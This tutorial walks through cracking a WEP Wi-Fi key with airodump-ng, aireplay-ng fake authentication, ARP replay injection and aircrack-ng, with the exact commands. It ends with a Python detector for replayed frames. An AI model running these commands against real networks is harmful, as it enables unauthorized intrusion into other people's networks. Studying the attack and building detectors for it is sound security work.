Hack WEP WiFi Network using ARP Replay Attack (Idle Network)

If the network is idle, with very few or no packets being transmitted, the WEP WiFi network hack will not work. Here we use an ARP replay attack, which works even on an idle network by associating with it and injecting new packets into it.

For this tutorial, my wireless interface card is wlan1 because my previous wireless interface was not strong enough to capture the packets. Now I am using a different wireless adapter, which is wlan1.

Steps to Hack WiFi using ARP Replay

  1. Enable Monitor Mode of Wireless Interface Card.
  2. Capture Packets using airodump-ng in Kali Linux against your target network.
    airodump-ng --bssid 62:23:6A:96:69:73 --channel 11 --write fakeattack wlan1
  3. Associate with the target network using aireplay-ng.
    aireplay-ng --fakeauth 0 -a 62:23:6A:96:69:73 -h 00:C0:CA:98:29:F3 wlan1
  4. Force the router to generate new packets with new IVs.
    aireplay-ng --arpreplay -b 62:23:6A:96:69:73 -h 00:C0:CA:98:29:F3 wlan1

    In the aireplay-ng command:

    • --arpreplay is the name of the attack
    • -b 62:23:6A:96:69:73 is the MAC address of my target network
    • -h 00:C0:CA:98:29:F3 is the MAC address of my wireless interface card
    • wlan1 is the wireless adapter in monitor mode

    Because we are associated with the target network, we can now force the router to generate new packets with new IVs. This increases the amount of captured data very quickly and lets us crack the WEP network much faster.

    In this attack, my wireless adapter waits for an ARP packet. Once we have the ARP packet, we capture it and re-transmit it. This forces the router to generate a new packet with a new IV. The process continues, and the router keeps generating new packets with new IVs.

  5. Once we have enough data packets, we will crack the network using aircrack-ng.

    aircrack-ng fakeattack-01.cap

    My network was cracked once I had 12846 IVs. I am using 64-bit WEP encryption. If you have 128-bit WEP encryption, it will take more time in your case.
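
The re-transmission described in step 4 is easy to spot from a monitoring sensor: WEP has no replay protection, so the re-sent frame carries the same IV and length every time. The following is an added example, not part of the original tutorial, that flags this pattern in frame metadata; the record layout, thresholds and sample MAC addresses are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

# Assumed thresholds (tune per environment): the same encrypted frame seen
# at least THRESHOLD times within WINDOW seconds is treated as a replay.
WINDOW = 1.0
THRESHOLD = 50

def detect_replay(frames, window=WINDOW, threshold=THRESHOLD):
    """frames: iterable of (timestamp, transmitter_mac, iv_hex, length),
    sorted by timestamp. Returns {transmitter: (iv, length)} for stations
    that repeat one identical WEP frame faster than the threshold."""
    recent = defaultdict(deque)  # (tx, iv, length) -> timestamps in window
    flagged = {}
    for ts, tx, iv, length in frames:
        key = (tx.lower(), iv, length)
        q = recent[key]
        q.append(ts)
        # Drop observations that have fallen out of the sliding window.
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and key[0] not in flagged:
            flagged[key[0]] = (iv, length)
    return flagged

def sample_frames():
    """Constructed sample data: one ordinary client and one replaying station."""
    frames = []
    # Ordinary client: every frame has a fresh IV and a varying length.
    for i in range(200):
        frames.append((i * 0.01, "aa:bb:cc:00:00:01", f"{i:06x}", 100 + i % 40))
    # Replaying station: one captured frame re-sent 500 times in one second.
    for i in range(500):
        frames.append((1.0 + i * 0.002, "aa:bb:cc:00:00:02", "1a2b3c", 68))
    frames.sort(key=lambda f: f[0])
    return frames

if __name__ == "__main__":
    for mac, (iv, length) in detect_replay(sample_frames()).items():
        print(f"possible ARP replay from {mac}: IV {iv}, length {length}")
```

A legitimate WEP client picks a new IV for each frame, so a burst of identical IV and length pairs from one transmitter is a strong signal even when the payload cannot be decrypted.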
